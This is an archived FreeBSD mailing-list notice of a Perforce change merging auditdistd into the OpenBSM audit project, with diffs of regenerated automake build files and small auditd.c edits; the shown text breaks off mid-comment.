From owner-p4-projects@FreeBSD.ORG Sun Nov 18 19:50:17 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id B6C3D8AA; Sun, 18 Nov 2012 19:50:17 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 753878A8 for ; Sun, 18 Nov 2012 19:50:17 +0000 (UTC) (envelope-from pjd@freebsd.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id 58ECE8FC13 for ; Sun, 18 Nov 2012 19:50:17 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAIJoHUH031889 for ; Sun, 18 Nov 2012 19:50:17 GMT (envelope-from pjd@freebsd.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAIJoHam031886 for perforce@freebsd.org; Sun, 18 Nov 2012 19:50:17 GMT (envelope-from pjd@freebsd.org) Date: Sun, 18 Nov 2012 19:50:17 GMT Message-Id: <201211181950.qAIJoHam031886@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to pjd@freebsd.org using -f From: Pawel Jakub Dawidek Subject: PERFORCE change 219804 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 18 Nov 2012 19:50:17 -0000 http://p4web.freebsd.org/@@219804?ac=10 Change 219804 by pjd@pjd_anger on 2012/11/18 19:49:22 Merge my work on auditdistd. Affected files ... .. //depot/projects/trustedbsd/openbsm/Makefile.am#5 integrate .. //depot/projects/trustedbsd/openbsm/Makefile.in#13 integrate .. //depot/projects/trustedbsd/openbsm/aclocal.m4#6 integrate .. //depot/projects/trustedbsd/openbsm/autogen.sh#2 integrate .. //depot/projects/trustedbsd/openbsm/bin/Makefile.am#4 integrate .. //depot/projects/trustedbsd/openbsm/bin/Makefile.in#14 integrate .. //depot/projects/trustedbsd/openbsm/bin/audit/Makefile.am#7 integrate .. //depot/projects/trustedbsd/openbsm/bin/audit/Makefile.in#15 integrate .. //depot/projects/trustedbsd/openbsm/bin/auditd/Makefile.am#6 integrate .. //depot/projects/trustedbsd/openbsm/bin/auditd/Makefile.in#14 integrate .. //depot/projects/trustedbsd/openbsm/bin/auditd/auditd.c#50 integrate .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/Makefile.am#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/Makefile.in#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.8#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.conf.5#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/auditdistd.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/faccessat.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/fstatat.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/openat.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/parse.y#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/pjdlog.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/pjdlog.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/proto.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/proto.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/proto_common.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/proto_impl.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/proto_socketpair.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/proto_tcp.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/proto_tls.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/proto_uds.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/receiver.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/renameat.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/sandbox.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/sandbox.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/sender.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/sigtimedwait.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/strndup.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/subr.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/subr.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/synch.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/token.l#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/trail.c#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/trail.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/unlinkat.h#1 branch .. //depot/projects/trustedbsd/openbsm/bin/auditfilterd/Makefile.am#4 integrate .. //depot/projects/trustedbsd/openbsm/bin/auditfilterd/Makefile.in#11 integrate .. //depot/projects/trustedbsd/openbsm/bin/auditreduce/Makefile.am#4 integrate .. //depot/projects/trustedbsd/openbsm/bin/auditreduce/Makefile.in#13 integrate .. //depot/projects/trustedbsd/openbsm/bin/praudit/Makefile.am#4 integrate .. //depot/projects/trustedbsd/openbsm/bin/praudit/Makefile.in#13 integrate .. //depot/projects/trustedbsd/openbsm/bsm/Makefile.am#5 integrate .. //depot/projects/trustedbsd/openbsm/bsm/Makefile.in#13 integrate .. //depot/projects/trustedbsd/openbsm/bsm/auditd_lib.h#5 integrate .. //depot/projects/trustedbsd/openbsm/bsm/libbsm.h#50 integrate .. //depot/projects/trustedbsd/openbsm/compat/closefrom.h#1 branch .. //depot/projects/trustedbsd/openbsm/compat/compat.h#1 branch .. //depot/projects/trustedbsd/openbsm/compat/endian.h#10 integrate .. //depot/projects/trustedbsd/openbsm/compat/flopen.h#1 branch .. //depot/projects/trustedbsd/openbsm/compat/pidfile.h#1 branch .. //depot/projects/trustedbsd/openbsm/config/config.h.in#23 integrate .. //depot/projects/trustedbsd/openbsm/configure#64 integrate .. //depot/projects/trustedbsd/openbsm/configure.ac#62 integrate .. //depot/projects/trustedbsd/openbsm/etc/audit_control#9 integrate .. //depot/projects/trustedbsd/openbsm/libauditd/Makefile.am#3 integrate .. //depot/projects/trustedbsd/openbsm/libauditd/Makefile.in#6 integrate .. //depot/projects/trustedbsd/openbsm/libauditd/auditd_lib.c#18 integrate .. //depot/projects/trustedbsd/openbsm/libbsm/Makefile.am#10 integrate .. //depot/projects/trustedbsd/openbsm/libbsm/Makefile.in#18 integrate .. //depot/projects/trustedbsd/openbsm/libbsm/au_control.3#17 integrate .. //depot/projects/trustedbsd/openbsm/libbsm/bsm_control.c#41 integrate .. //depot/projects/trustedbsd/openbsm/man/Makefile.am#2 integrate .. //depot/projects/trustedbsd/openbsm/man/Makefile.in#12 integrate .. //depot/projects/trustedbsd/openbsm/man/audit_control.5#26 integrate .. //depot/projects/trustedbsd/openbsm/modules/Makefile.am#2 integrate .. //depot/projects/trustedbsd/openbsm/modules/Makefile.in#10 integrate .. //depot/projects/trustedbsd/openbsm/modules/auditfilter_noop/Makefile.am#4 integrate .. //depot/projects/trustedbsd/openbsm/modules/auditfilter_noop/Makefile.in#11 integrate .. //depot/projects/trustedbsd/openbsm/sys/Makefile.am#2 integrate .. //depot/projects/trustedbsd/openbsm/sys/Makefile.in#7 integrate .. //depot/projects/trustedbsd/openbsm/sys/bsm/Makefile.am#5 integrate .. //depot/projects/trustedbsd/openbsm/sys/bsm/Makefile.in#10 integrate .. //depot/projects/trustedbsd/openbsm/test/Makefile.am#3 integrate .. //depot/projects/trustedbsd/openbsm/test/Makefile.in#11 integrate .. //depot/projects/trustedbsd/openbsm/test/bsm/Makefile.am#4 integrate .. //depot/projects/trustedbsd/openbsm/test/bsm/Makefile.in#11 integrate .. //depot/projects/trustedbsd/openbsm/tools/Makefile.am#5 integrate .. //depot/projects/trustedbsd/openbsm/tools/Makefile.in#14 integrate Differences ... ==== //depot/projects/trustedbsd/openbsm/Makefile.am#5 (text+ko) ==== @@ -1,6 +1,6 @@ -# -# $P4: //depot/projects/trustedbsd/openbsm/Makefile.am#4 $ -# +## +## $P4: //depot/projects/trustedbsd/openbsm/Makefile.am#5 $ +## SUBDIRS = \ bsm @@ -17,6 +17,7 @@ modules \ sys +ACLOCAL_AMFLAGS = -I m4 EXTRA_DIST = \ CHANGELOG \ ==== //depot/projects/trustedbsd/openbsm/Makefile.in#13 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.1 from Makefile.am. +# Makefile.in generated by automake 1.12.4 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. @@ -13,10 +13,6 @@ # PARTICULAR PURPOSE. @SET_MAKE@ - -# -# $P4: //depot/projects/trustedbsd/openbsm/Makefile.in#12 $ -# VPATH = @srcdir@ am__make_dryrun = \ { \ @@ -64,7 +60,8 @@ $(top_srcdir)/config/install-sh $(top_srcdir)/config/ltmain.sh \ $(top_srcdir)/config/missing $(top_srcdir)/configure INSTALL \ NEWS TODO config/config.guess config/config.sub config/depcomp \ - config/install-sh config/ltmain.sh config/missing + config/install-sh config/ltmain.sh config/missing \ + config/ylwrap ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ @@ -172,6 +169,9 @@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ +LEX = @LEX@ +LEXLIB = @LEXLIB@ +LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ @@ -203,6 +203,8 @@ SHELL = @SHELL@ STRIP = @STRIP@ VERSION = @VERSION@ +YACC = @YACC@ +YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ @@ -241,6 +243,7 @@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ +mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ @@ -255,6 +258,7 @@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ SUBDIRS = bsm $(am__append_1) libbsm bin man modules sys +ACLOCAL_AMFLAGS = -I m4 EXTRA_DIST = \ CHANGELOG \ LICENSE \ @@ -330,7 +334,7 @@ # (1) if the variable is set in 'config.status', edit 'config.status' # (which will cause the Makefiles to be regenerated when you run 'make'); # (2) otherwise, pass the desired values on the 'make' command line. -$(RECURSIVE_TARGETS): +$(RECURSIVE_TARGETS) $(RECURSIVE_CLEAN_TARGETS): @fail= failcom='exit 1'; \ for f in x $$MAKEFLAGS; do \ case $$f in \ @@ -340,7 +344,11 @@ done; \ dot_seen=no; \ target=`echo $@ | sed s/-recursive//`; \ - list='$(SUBDIRS)'; for subdir in $$list; do \ + case "$@" in \ + distclean-* | maintainer-clean-*) list='$(DIST_SUBDIRS)' ;; \ + *) list='$(SUBDIRS)' ;; \ + esac; \ + for subdir in $$list; do \ echo "Making $$target in $$subdir"; \ if test "$$subdir" = "."; then \ dot_seen=yes; \ @@ -354,37 +362,6 @@ if test "$$dot_seen" = "no"; then \ $(MAKE) $(AM_MAKEFLAGS) "$$target-am" || exit 1; \ fi; test -z "$$fail" - -$(RECURSIVE_CLEAN_TARGETS): - @fail= failcom='exit 1'; \ - for f in x $$MAKEFLAGS; do \ - case $$f in \ - *=* | --[!k]*);; \ - *k*) failcom='fail=yes';; \ - esac; \ - done; \ - dot_seen=no; \ - case "$@" in \ - distclean-* | maintainer-clean-*) list='$(DIST_SUBDIRS)' ;; \ - *) list='$(SUBDIRS)' ;; \ - esac; \ - rev=''; for subdir in $$list; do \ - if test "$$subdir" = "."; then :; else \ - rev="$$subdir $$rev"; \ - fi; \ - done; \ - rev="$$rev ."; \ - target=`echo $@ | sed s/-recursive//`; \ - for subdir in $$rev; do \ - echo "Making $$target in $$subdir"; \ - if test "$$subdir" = "."; then \ - local_target="$$target-am"; \ - else \ - local_target="$$target"; \ - fi; \ - ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ - || eval $$failcom; \ - done && test -z "$$fail" tags-recursive: list='$(SUBDIRS)'; for subdir in $$list; do \ test "$$subdir" = . || ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) tags); \ @@ -604,9 +581,9 @@ *.zip*) \ unzip $(distdir).zip ;;\ esac - chmod -R a-w $(distdir); chmod a+w $(distdir) - mkdir $(distdir)/_build - mkdir $(distdir)/_inst + chmod -R a-w $(distdir) + chmod u+w $(distdir) + mkdir $(distdir)/_build $(distdir)/_inst chmod a-w $(distdir) test -d $(distdir)/_build || exit 0; \ dc_install_base=`$(am__cd) $(distdir)/_inst && pwd | sed -e 's,^[^:\\/]:[\\/],/,'` \ ==== //depot/projects/trustedbsd/openbsm/aclocal.m4#6 (text+ko) ==== @@ -1,4 +1,4 @@ -# generated automatically by aclocal 1.12.1 -*- Autoconf -*- +# generated automatically by aclocal 1.12.4 -*- Autoconf -*- # Copyright (C) 1996-2012 Free Software Foundation, Inc. @@ -8612,8 +8612,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 8 - # AM_AUTOMAKE_VERSION(VERSION) # ---------------------------- # Automake X.Y traces this macro to ensure aclocal.m4 has been @@ -8623,7 +8621,7 @@ [am__api_version='1.12' dnl Some users find AM_AUTOMAKE_VERSION and mistake it for a way to dnl require some minimum version. Point them to the right macro. -m4_if([$1], [1.12.1], [], +m4_if([$1], [1.12.4], [], [AC_FATAL([Do not call $0, use AM_INIT_AUTOMAKE([$1]).])])dnl ]) @@ -8639,7 +8637,7 @@ # Call AM_AUTOMAKE_VERSION and AM_AUTOMAKE_VERSION so they can be traced. # This function is AC_REQUIREd by AM_INIT_AUTOMAKE. AC_DEFUN([AM_SET_CURRENT_AUTOMAKE_VERSION], -[AM_AUTOMAKE_VERSION([1.12.1])dnl +[AM_AUTOMAKE_VERSION([1.12.4])dnl m4_ifndef([AC_AUTOCONF_VERSION], [m4_copy([m4_PACKAGE_VERSION], [AC_AUTOCONF_VERSION])])dnl _AM_AUTOCONF_VERSION(m4_defn([AC_AUTOCONF_VERSION]))]) @@ -8652,8 +8650,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 2 - # For projects using AC_CONFIG_AUX_DIR([foo]), Autoconf sets # $ac_aux_dir to '$srcdir/foo'. In other projects, it is set to # '$srcdir', '$srcdir/..', or '$srcdir/../..'. @@ -8707,8 +8703,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 10 - # AM_CONDITIONAL(NAME, SHELL-CONDITION) # ------------------------------------- # Define a conditional. @@ -8740,7 +8734,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 17 # There are a few dirty hacks below to avoid letting 'AC_PROG_CC' be # written in clear, in which case automake, when reading aclocal.m4, @@ -8932,7 +8925,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 6 # _AM_OUTPUT_DEPENDENCY_COMMANDS # ------------------------------ @@ -9009,8 +9001,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 19 - # This macro actually does too much. Some checks are only needed if # your package does certain things. But this isn't really a big deal. @@ -9085,6 +9075,11 @@ AC_REQUIRE([AM_PROG_INSTALL_SH])dnl AC_REQUIRE([AM_PROG_INSTALL_STRIP])dnl AC_REQUIRE([AC_PROG_MKDIR_P])dnl +# For better backward compatibility. To be removed once Automake 1.9.x +# dies out for good. For more background, see: +# +# +AC_SUBST([mkdir_p], ['$(MKDIR_P)']) # We need awk for the "check" target. The system "awk" is bad on # some platforms. AC_REQUIRE([AC_PROG_AWK])dnl @@ -9157,8 +9152,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 8 - # AM_PROG_INSTALL_SH # ------------------ # Define $install_sh. @@ -9180,8 +9173,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 2 - # Check whether the underlying file-system supports filenames # with a leading dot. For instance MS-DOS doesn't. AC_DEFUN([AM_SET_LEADING_DOT], @@ -9204,8 +9195,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 7 - # AM_MAINTAINER_MODE([DEFAULT-MODE]) # ---------------------------------- # Control maintainer-specific portions of Makefiles. @@ -9243,8 +9232,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 5 - # AM_MAKE_INCLUDE() # ----------------- # Check to see how make treats includes. @@ -9295,8 +9282,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 7 - # AM_MISSING_PROG(NAME, PROGRAM) # ------------------------------ AC_DEFUN([AM_MISSING_PROG], @@ -9304,7 +9289,6 @@ $1=${$1-"${am_missing_run}$2"} AC_SUBST($1)]) - # AM_MISSING_HAS_RUN # ------------------ # Define MISSING if not defined so far and test if it supports --run. @@ -9337,8 +9321,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 6 - # _AM_MANGLE_OPTION(NAME) # ----------------------- AC_DEFUN([_AM_MANGLE_OPTION], @@ -9370,8 +9352,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 9 - # AM_SANITY_CHECK # --------------- AC_DEFUN([AM_SANITY_CHECK], @@ -9453,8 +9433,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 2 - # AM_PROG_INSTALL_STRIP # --------------------- # One issue with vendor 'install' (even GNU) is that you can't @@ -9483,8 +9461,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 3 - # _AM_SUBST_NOTMAKE(VARIABLE) # --------------------------- # Prevent Automake from outputting VARIABLE = @VARIABLE@ in Makefile.in. @@ -9504,8 +9480,6 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 3 - # _AM_PROG_TAR(FORMAT) # -------------------- # Check how to create a tarball in format FORMAT. ==== //depot/projects/trustedbsd/openbsm/autogen.sh#2 (text+ko) ==== @@ -1,6 +1,6 @@ #!/bin/sh # -# $P4: //depot/projects/trustedbsd/openbsm/autogen.sh#1 $ +# $P4: //depot/projects/trustedbsd/openbsm/autogen.sh#2 $ # libtoolize --copy --force ==== //depot/projects/trustedbsd/openbsm/bin/Makefile.am#4 (text+ko) ==== @@ -1,8 +1,9 @@ -# -# $P4: //depot/projects/trustedbsd/openbsm/bin/Makefile.am#3 $ -# +## +## $P4: //depot/projects/trustedbsd/openbsm/bin/Makefile.am#4 $ +## SUBDIRS = \ + auditdistd \ auditfilterd \ auditreduce \ praudit ==== //depot/projects/trustedbsd/openbsm/bin/Makefile.in#14 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.1 from Makefile.am. +# Makefile.in generated by automake 1.12.4 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. @@ -13,10 +13,6 @@ # PARTICULAR PURPOSE. @SET_MAKE@ - -# -# $P4: //depot/projects/trustedbsd/openbsm/bin/Makefile.in#13 $ -# VPATH = @srcdir@ am__make_dryrun = \ { \ @@ -88,7 +84,8 @@ distdir ETAGS = etags CTAGS = ctags -DIST_SUBDIRS = auditfilterd auditreduce praudit audit auditd +DIST_SUBDIRS = auditdistd auditfilterd auditreduce praudit audit \ + auditd DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) am__relativize = \ dir0=`pwd`; \ @@ -147,6 +144,9 @@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ +LEX = @LEX@ +LEXLIB = @LEXLIB@ +LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ @@ -178,6 +178,8 @@ SHELL = @SHELL@ STRIP = @STRIP@ VERSION = @VERSION@ +YACC = @YACC@ +YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ @@ -216,6 +218,7 @@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ +mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ @@ -229,7 +232,7 @@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ -SUBDIRS = auditfilterd auditreduce praudit $(am__append_1) +SUBDIRS = auditdistd auditfilterd auditreduce praudit $(am__append_1) all: all-recursive .SUFFIXES: @@ -276,7 +279,7 @@ # (1) if the variable is set in 'config.status', edit 'config.status' # (which will cause the Makefiles to be regenerated when you run 'make'); # (2) otherwise, pass the desired values on the 'make' command line. -$(RECURSIVE_TARGETS): +$(RECURSIVE_TARGETS) $(RECURSIVE_CLEAN_TARGETS): @fail= failcom='exit 1'; \ for f in x $$MAKEFLAGS; do \ case $$f in \ @@ -286,7 +289,11 @@ done; \ dot_seen=no; \ target=`echo $@ | sed s/-recursive//`; \ - list='$(SUBDIRS)'; for subdir in $$list; do \ + case "$@" in \ + distclean-* | maintainer-clean-*) list='$(DIST_SUBDIRS)' ;; \ + *) list='$(SUBDIRS)' ;; \ + esac; \ + for subdir in $$list; do \ echo "Making $$target in $$subdir"; \ if test "$$subdir" = "."; then \ dot_seen=yes; \ @@ -300,37 +307,6 @@ if test "$$dot_seen" = "no"; then \ $(MAKE) $(AM_MAKEFLAGS) "$$target-am" || exit 1; \ fi; test -z "$$fail" - -$(RECURSIVE_CLEAN_TARGETS): - @fail= failcom='exit 1'; \ - for f in x $$MAKEFLAGS; do \ - case $$f in \ - *=* | --[!k]*);; \ - *k*) failcom='fail=yes';; \ - esac; \ - done; \ - dot_seen=no; \ - case "$@" in \ - distclean-* | maintainer-clean-*) list='$(DIST_SUBDIRS)' ;; \ - *) list='$(SUBDIRS)' ;; \ - esac; \ - rev=''; for subdir in $$list; do \ - if test "$$subdir" = "."; then :; else \ - rev="$$subdir $$rev"; \ - fi; \ - done; \ - rev="$$rev ."; \ - target=`echo $@ | sed s/-recursive//`; \ - for subdir in $$rev; do \ - echo "Making $$target in $$subdir"; \ - if test "$$subdir" = "."; then \ - local_target="$$target-am"; \ - else \ - local_target="$$target"; \ - fi; \ - ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ - || eval $$failcom; \ - done && test -z "$$fail" tags-recursive: list='$(SUBDIRS)'; for subdir in $$list; do \ test "$$subdir" = . || ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) tags); \ ==== //depot/projects/trustedbsd/openbsm/bin/audit/Makefile.am#7 (text+ko) ==== @@ -1,6 +1,6 @@ -# -# $P4: //depot/projects/trustedbsd/openbsm/bin/audit/Makefile.am#6 $ -# +## +## $P4: //depot/projects/trustedbsd/openbsm/bin/audit/Makefile.am#7 $ +## if USE_NATIVE_INCLUDES INCLUDES = -I$(top_builddir) -I$(top_srcdir) ==== //depot/projects/trustedbsd/openbsm/bin/audit/Makefile.in#15 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.1 from Makefile.am. +# Makefile.in generated by automake 1.12.4 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. @@ -14,10 +14,6 @@ @SET_MAKE@ -# -# $P4: //depot/projects/trustedbsd/openbsm/bin/audit/Makefile.in#14 $ -# - VPATH = @srcdir@ am__make_dryrun = \ { \ @@ -159,6 +155,9 @@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ +LEX = @LEX@ +LEXLIB = @LEXLIB@ +LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ @@ -190,6 +189,8 @@ SHELL = @SHELL@ STRIP = @STRIP@ VERSION = @VERSION@ +YACC = @YACC@ +YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ @@ -228,6 +229,7 @@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ +mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ ==== //depot/projects/trustedbsd/openbsm/bin/auditd/Makefile.am#6 (text+ko) ==== @@ -1,6 +1,6 @@ -# -# $P4: //depot/projects/trustedbsd/openbsm/bin/auditd/Makefile.am#5 $ -# +## +## $P4: //depot/projects/trustedbsd/openbsm/bin/auditd/Makefile.am#6 $ +## if USE_NATIVE_INCLUDES INCLUDES = -I$(top_builddir) -I$(top_srcdir) ==== //depot/projects/trustedbsd/openbsm/bin/auditd/Makefile.in#14 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.1 from Makefile.am. +# Makefile.in generated by automake 1.12.4 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. @@ -14,10 +14,6 @@ @SET_MAKE@ -# -# $P4: //depot/projects/trustedbsd/openbsm/bin/auditd/Makefile.in#13 $ -# - VPATH = @srcdir@ am__make_dryrun = \ { \ @@ -164,6 +160,9 @@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ +LEX = @LEX@ +LEXLIB = @LEXLIB@ +LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ @@ -195,6 +194,8 @@ SHELL = @SHELL@ STRIP = @STRIP@ VERSION = @VERSION@ +YACC = @YACC@ +YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ @@ -233,6 +234,7 @@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ +mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ ==== //depot/projects/trustedbsd/openbsm/bin/auditd/auditd.c#50 (text+ko) ==== @@ -26,7 +26,7 @@ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * - * $P4: //depot/projects/trustedbsd/openbsm/bin/auditd/auditd.c#49 $ + * $P4: //depot/projects/trustedbsd/openbsm/bin/auditd/auditd.c#50 $ */ #include @@ -36,9 +36,9 @@ #include #ifdef HAVE_FULL_QUEUE_H #include -#else /* !HAVE_FULL_QUEUE_H */ +#else /* !HAVE_FULL_QUEUE_H */ #include -#endif /* !HAVE_FULL_QUEUE_H */ +#endif /* !HAVE_FULL_QUEUE_H */ #include #include #include @@ -82,18 +82,18 @@ * LaunchD flag (Mac OS X and, maybe, FreeBSD only.) See launchd(8) and * http://wiki.freebsd.org/launchd for more information. * - * In order for auditd to work "on demand" with launchd(8) it can't: - * call daemon(3) - * call fork and having the parent process exit - * change uids or gids. - * set up the current working directory or chroot. - * set the session id - * change stdio to /dev/null. - * call setrusage(2) - * call setpriority(2) - * Ignore SIGTERM. - * auditd (in 'launchd mode') is launched on demand so it must catch - * SIGTERM to exit cleanly. + * In order for auditd to work "on demand" with launchd(8) it can't: + * call daemon(3) + * call fork and having the parent process exit + * change uids or gids. + * set up the current working directory or chroot. + * set the session id + * change stdio to /dev/null. + * call setrusage(2) + * call setpriority(2) + * Ignore SIGTERM. + * auditd (in 'launchd mode') is launched on demand so it must catch + * SIGTERM to exit cleanly. */ static int launchd_flag = 0; @@ -168,7 +168,7 @@ /* Rename the last file -- append timestamp. */ if ((ptr = strstr(lastfile, NOT_TERMINATED)) != NULL) { memcpy(ptr, TS, POSTFIX_LEN); - if (rename(oldname, lastfile) != 0) + if (auditd_rename(oldname, lastfile) != 0) auditd_log_err( "Could not rename %s to %s: %m", oldname, lastfile); @@ -199,12 +199,35 @@ swap_audit_file(void) { int err; - char *newfile; - char TS[TIMESTAMP_LEN]; + char *newfile, *name; + char TS[TIMESTAMP_LEN + 1]; time_t tt; - if (getTSstr(tt, TS, TIMESTAMP_LEN) != 0) + if (getTSstr(tt, TS, sizeof(TS)) != 0) return (-1); + /* + * If prefix and suffix are the same, it means that records are + * being produced too fast. We 